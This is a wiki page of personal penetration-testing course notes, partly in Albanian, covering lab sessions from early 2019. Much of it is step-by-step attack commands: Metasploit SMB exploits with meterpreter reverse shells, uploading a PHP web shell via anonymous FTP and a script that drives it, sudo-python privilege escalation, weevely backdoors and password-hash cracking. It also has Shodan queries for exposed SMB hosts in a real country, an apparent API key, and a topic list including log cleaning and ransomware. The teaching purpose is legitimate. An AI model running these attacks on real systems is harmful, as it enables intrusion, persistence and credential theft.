dardan:cyberacademy:module-12-virtual_penetration_testing_lab
Product: ISR4221-SEC/K9 Description: Cisco ISR 4221 SEC Bundle with SEC lic Product: CON-SNT-ISR4221S Description: SNTC-8X5XNBD Cisco ISR 4221 SEC B https://www.amazon.de/JBC-Telefon-Uhr-Kleiner-Abenteurer/dp/B07MFZY6X9/ref=sr_1_10?keywords=smartwatch%2Bf %C3%BCr%2Bkinder&qid=1552766038&s=gateway&sr=8-10&th=1 Cisco Catalyst 3850-48 Switch with K9 IOS and 1 year smartnet ASA 5516-X with FirePOWER Services, 1 year smartnet Bit@shit-locker
=============================================================================================
=============================================================================================
09.01.2019
pen test?
before pent test
- understanding OS-s (not only win and Linux)
services
- vector of attack
metoden per sulm
red team - me gjet vull
blue tram - me fix vull
purple testing - mixed
pen test... means capture the flag
white box
black box
grey box
scada systems
aurora generator
stage zero - mi kkuptu nevojat e ati biznesi
passwd, shadow
sudo unshadow /etc/passwd /etc/shadow
crack hash
--------
ftp, http 8080
vector of attack: anonymous ne ftp
vsftpd 2.3.4 - Backdoor Command Execution
me upload naj shell script
me hide file
ls command, me gjet file
-----------------------------
msf5 > use auxiliary/scanner/smb/smb_enumshares
msf5 auxiliary(scanner/smb/smb_enumshares) > show options
msf5 auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 172.16.60.142
msf5 auxiliary(scanner/smb/smb_enumshares) > set THREADS 10
msf5 auxiliary(scanner/smb/smb_enumshares) > run
msf5 > use auxiliary/scanner/smb/smb_login
msf5 > use auxiliary/scanner/smb/smb_login>set smbuser
msf5 > use auxiliary/scanner/smb/smb_login>set smbpass
msf5 > use auxiliary/scanner/smb/smb_login>set RHOSTS 172.16.60.1/24
msf5 > use auxiliary/scanner/smb/smb_login>set THREADS 30
msf5 > use auxiliary/scanner/smb/smb_login>run
> use exploit/windows/smb/psexec
> use exploit/windows/smb/psexec>set smbuser
> use exploit/windows/smb/psexec>set smbpass
> use exploit/windows/smb/psexec>set payload windows/meterpreter/reverse_tcp
> use exploit/windows/smb/psexec>set lhost 172.16.65.132
> use exploit/windows/smb/psexec>set rhost 172.16.60.73
> use exploit/windows/smb/ms08_067_netapi
> set rhost 172.16.60.87
> set lhost 172.16.60.77
> set payload windows/meterpreter/reverse_tcp
bitc admin
cert util
=============================================================================================
=============================================================================================
06.02.2019
OSCP cert
CEH cert
CTF Capture the flag
cissp certification
Topic:
miss configuration
bad habbits
me lon paths ex. /var/www/html - public folder
/etc/appache2 - config i Apache
vulnerability: file permission wrong configured
https://dokuwiki.pejaime.com/lib/exe/fetch.php?media=dardan:f5:ms17-010-eternalblue7-2.pdf
============================================================================================= ============================================================================================= 08.02.2019 nmap -sU -p 161 172.16.15.15 snmpwalk -v 1 -c public target ip msf5 > use auxiliary/scanner/snmp/snmp_enum msf5 > use auxiliary/scanner/snmp/snmp_enumshares msf5 > use auxiliary/scanner/snmp/snmp_enumusers msf5 > use auxiliary/scanner/snmp/cisco_config_tftp msf5 > use auxiliary/scanner/snmp/cisco_upload_file
=============================================================================================
=============================================================================================
11.02.2019
Information Gathering
Passive
most important proccess of hacking
permes 3rd parties, nuk rekomandohet drejt perdrejt
-whois, tool dhe database
-archive.org
-theharverset
-recon-ng
-job portalet, merr info per sisteme permes job description
-google hack
Active
-doomster diving
-google hack (dorks)
-dns recon, prej Ip e nxerr domain,
-shodan
-----------------------------
domain
subdomain *domain
extension .com .net
-----------------------------
Faza 2
direkt
Vector of Attack
# pip2 install shodan
www.shodan.io
permes temp mail regjistrohesh ne shodan.io
root@kali:~# shodan init ygxXXC1rOzk2VhqpzkmIWKHcR0Xypu2H
ne search te shodan.io:
country:"al" port:"445" os:"windows"
search with IP
ISP:"Kujtesa"
shodan cli:
# shodan host 84.22.59.42
----------------------------------------------------------------
Weevely
Usage
weevely generate <password> <path>
weevely <URL> <password> [cmd]
Description
# git clone https://github.com/epinna/weevely3.git
/weevely3# python weevely.py genereate 123 ~/Deskop/tt.py
mv tt.pu to /var/www/htmp
python weevely.py http://172.16.65.98/
# scp file.php user@ip.65.98:/home/userhome/ ### transfer kali to ubuntu apache2 server
============================================================================================= ============================================================================================= 13.02.2019 OSINT Framewarks https://osintframework.com/ Information Gathering domain: ickosovo.com Red Hawk Th3inspector BadKarma – Advance Network Reconnaissance Toolkit DMitry – Deepmagic Information Gathering Tool Devploit – Information Gathering Tool https://osintframework.com/ https://www.geocreepy.com/
============================================================================================= ============================================================================================= 18.02.2019 nessus scan dradis - upload nessus exportet db to generate reports http://localhost:3000 cat file.csv | grep "172.16.1" | cut -d |," -f 5 | sort -u nmap -p- iL filename --- to scan from list nmap -iL filename --exclude 172.16.1.204 --- to exclude from result nmap -p- ip/24 >> scan_result nmap -p 21,22,23 ip/24 >> scan_result --- specific scan nmap -p- i172.16.1.19 --- 554 rtsp found install vlc Metasploit https://localhost:3790/ asdf 12345@tmp
============================================================================================= ============================================================================================= 20.02.2019 to identify file "what" target 172.16.65.165 $ strings what ### to understand if it is archive hint1: formula per tnt # gzip what $ gzip -d what.gz $ file what what: OpenDocument Text
============================================================================================= ============================================================================================= 22.02.2019 Cryptography ==SYMMETRIC== scitaly of sparta symetrik = ekcryp dhe decru=yp me qels te njejt Kerckhoff qysh me me ja dit algoritmin psh RSA, AES key ## substitution ciphers --- duhet me dite logjiken/algortmin e tableses a -> k b -> d c -> n AES-256 = quantom proof, milona vjet vyn ----------------------------------------------------- ## letter frequency analysis E 13% T 9% A 8% QU ----------------------------------------------------- ## scissor cipher if ABCDEF...XYZ ----------------------------------------------------- ##Affine cipher plus multiplyer Ex = Ax + Bxmod26 euclidean algorithm ----------------------------------------------------- ## vigenere ciphers ----------------------------------------------------- ## stream cipher & block cipher Encryptojm bita A5/1 RC4 T RNG P RNG middle square seed = ###block cipher Encryptojm blloqe DES - 16 her e key whitening, SHANON (confession ^ diffusion) AES, EBC, CBC
============================================================================================= ============================================================================================= 25.02.2019 /var/log/proftpd# tail -f /var/log/proftpd.log real time log logging tail -f /var/log/proftpd.log real time log logging /var/log/apache2# tail -f access.log iptables -L --line --- view by line iptables -D INPUT 3 --- to delete a line iptables -A INPUT -s 172.16.65.153 -p tcp --destination-port 80 -j DROP --- to add rule iptables -D INPUT -s 172.16.65.153 -p tcp --destination-port 80 -j DROP --- to delete rule # netstat -naop | grep ESTABLISHED # kill -9 1475 # lsof -n -i --- view all connections arp -a me na i pa IP jane ndrru IP jane clone IP tona screen procesi u hijeck ssh user@ip
=============================================================================================
=============================================================================================
27.02.2019
Targetr
172.16.65.136
# nmap 172.16.65.136
21/tcp open ftp
22/tcp open ssh
80/tcp open http
# nmap -sV 172.16.65.136
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
21/tcp open ftp ProFTPD 1.3.5e
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
# dirb http://172.16.65.136
msf > search ProFTPD 1.3.5e
# cd /usr/share/webshells/php/
root@kali:/usr/share/webshells/php# cp simple-backdoor.php dani.php
# ftp 172.16.65.136
user/pass:anonymous/anonymous
ftp> cd /var/www/html/
ftp> put dani.php
http://172.16.65.136/dani.php
http://172.16.65.136/dani.php?cmd=cmd qe dojm me execute
nano ftp.py
import requests
while True:
cmd = raw_input("> ")
r = requests.get("http://172.16.65.136/simple-backdoor.php?cmd={}".format(cmd))
print r.text
python ftp.py 172.16.65.136
$ ssh anonymous:anonymous@172.16.65.136
anonymous@digitalschool:/home/drinor$ cat .bash_history
$ ssh drinor:Retro1@172.16.65.136
$ sudo su
[sudo] password for drinor:Retro1
root@digitalschool:/home/drinor# :)
============================================================================================= ============================================================================================= 01.03.2019 LAB hostat qe jan me provu mi hack
=============================================================================================
=============================================================================================
04.03.2019
Build AdminFinder.py
Wget.py /cget.exe
kemi marr qasje
me majt persistance
vetem 22 qel
cka kemi me bo
add user
user add /nuk krijon home dir
/passwd
kan /home, skan /bin/bash
---------------------------------------
Backdoors|malware for specific systems:
-/usr/share//webshells/: asp aspx cfm jsp perl php
-
$ service apache2 status
---------------------------------------
web media files
qysh me automatizu mi marr krejt files perniher
>>>wget.download('http://127.0.0.1/all.zip
============================================================================================= ============================================================================================= 06.03.2019 Build Utilman
=============================================================================================
=============================================================================================
11.03.2019
exam complexity:
recruite --- level 1
Flag te 10.20.20.13 me smb
CA1{7SEkYLPrxEdvRcR}
============================================================================================= ============================================================================================= Finial EXAM shtune 10 27.04 dille 9:59 28.04 lab - complexity per 24 ore 10 - 11 machines pivoting web "no support prej njeri-tjetrit" before exam: meso para exam setup machine and tools johntheripper -- be sure lates version
=============================================================================================
=============================================================================================
15.03.2019
Target: 65.136
mkdir Voyager
Files
nmap 172.16.65.136 -p- #vetem open ports
nmap -sS -sV -p22,80,2020 172.16.65.136
--- results here ---
http://172.16.65.136:2020
method not allowed
http://172.16.65.136
there is a foto, mmmm
view source code - nothing :(
there is a directory
dirb or gobuster --- nothing only image folder
http://172.16.65.136/img ----- there are some imgs
mkdir img
wget http://172.16.65.136/img/1.jpeg, 2.jpeg, 3.jepg --- to download
steghide info 1.jpg
steghide info 2.jpg ---mm there is something on it
steghide extract -sf 2.jpg -- to extract
#ls --- there is a file .py extracted
nano voyager.py
Flaskt ----lib is on there
pranon post request
requester need to send image/file
18:42 :46 --- komentimi i voyager.py
id
ps -aux
linenum
2 users
john
bon
base64 /home/john/cred -w 0 -- me marr file
base64 extract
#file cred
cred: OpenDocument cred
# libreoffice cred
require password
johntheripper is used here
john.pot -- ketu i run ato qe hacked once
#sudo ./john xxx
e gjen passwordin e cred
me qat user e pass provo ne web login
ssh john@172.16.65.136
nano vayager.conf
sudo -l
sudo /usr/bin/lib/
IDS bypass scan methods:
idle scan
fragmented scan
IDS e veren nmap scan
DT - teknologji meshtrim , ex honeypot
snort - IDS
splank - log aggregator, plus pattern bilder
elastic search --- run on no sql database, very fast
alien voult
carbon black
silence
endpoint protection
- on cloud
- salability
- quarantine the inf. host
============================================================================================= ============================================================================================= 20.03.2019 sudo tcpdump net 10.0.20.0/24 -w logs.txt Target: 172.16.65.123 nmap 172.16.65.123 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-20 12:53 EDT Nmap scan report for 172.16.65.123 Host is up (0.0099s latency). Not shown: 989 closed ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 5357/tcp open wsdapi 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown
=============================================================================================
=============================================================================================
25.03.2019
target
172.16.65.73
nmap 172.16.65.73
nmap -sS -sV -p80, 172.16.65.73
dir http://172.16.65.73
echo xxxxxxx | base64 -d
http://172.16.65.73/armageddon --- na jep private key
nano ssh-key --- paste the key
chmod 600 ssh-key
ssh -i ssh-key armageddon@172.16.65.73
> :)
# sudo -l
User armageddon may run the following commands on armageddon:
(root) NOPASSWD: /usr/bin/python
nano shell.py
import os
import sys ('sudo su')
# sudo /usr/bin/pytho shell.py
# root :)
============================================================================================= ============================================================================================= 27.03.2019 Build netcat with malware included which will provide session
============================================================================================= ============================================================================================= 29.03.2019 snmptwlak
nikto wpscan creeddump smbrelay netntlmex.py fingerprint.py incpacket pth load incognito —- komanda proxychains socks 4a dex2jar apk tool apk sign tcpdump wireshark curl_user —– local exploit ms12_020 ——- exploit rdesktop folder/file sharing domain hashdump me shadowcopy———————— koncept dll injection me msfvenom ————————— malicious dll subdomain bruteforce me wisler———————– cloudflair bypass nslookup revrselookup domain quaries me net komanada fileless attacks me regsvv serveo.net port forwardaing ssh shuttle port fowarding plink port forwarding ssh shuttle tunneling plink ssh tunnel burp captcha bypass sql injection me sqlmap cmd to sqlmap eavent log cleaner altrait data stream cron jobs task schedule reg add ubfiscation base32/64 encode decode esbsb encyption decryption setghide me krejt paketen pop3 brute force snmpt public dhe private string bruteforce xhydra hydra medusa ncrack netcat edhe nc file transfer netcat dhe nc bypass uac ask injection local exploits (metasploit) autoroute dhe static route reverse enginiering imunity debugger ovidebugger ransonmware simetric ecryption reverse ransomware local authetication bypas cmd stickykey injection linux init injection show mount (metasploit) enum filezila_server enum outlook enum skype export firefox history and data export chrome history and data decrypt saved password prive escelation me wget prive escelation me cat prive esc me vim and vi price esc me python hooks prive esc me pip prive esc me find kurnel exploit gcc compailer g++ compailer\ uncomplie 6 apache virtual host engen x mode ssl mode security php shell perl shell asp aspx shell veawly 3 smb clinet fing protocol smtp relay thc ipv6 attack thc ssl atack slow lories slow http test pyinstaller wine32/64 golang metasploit presistenc bits admin powershell url donwload cert util unicorne etherape permiscues mode mac changer big mac attack roge access point iot default creeds rtsp access me vlc jonthripper hashcat wordpress brutefoce me hashcat mode m400 dhe m500 jomlascan ———– tool dropal enumeration
dardan/cyberacademy/module-12-virtual_penetration_testing_lab.txt · Last modified: 2019/03/29 17:53 by dardan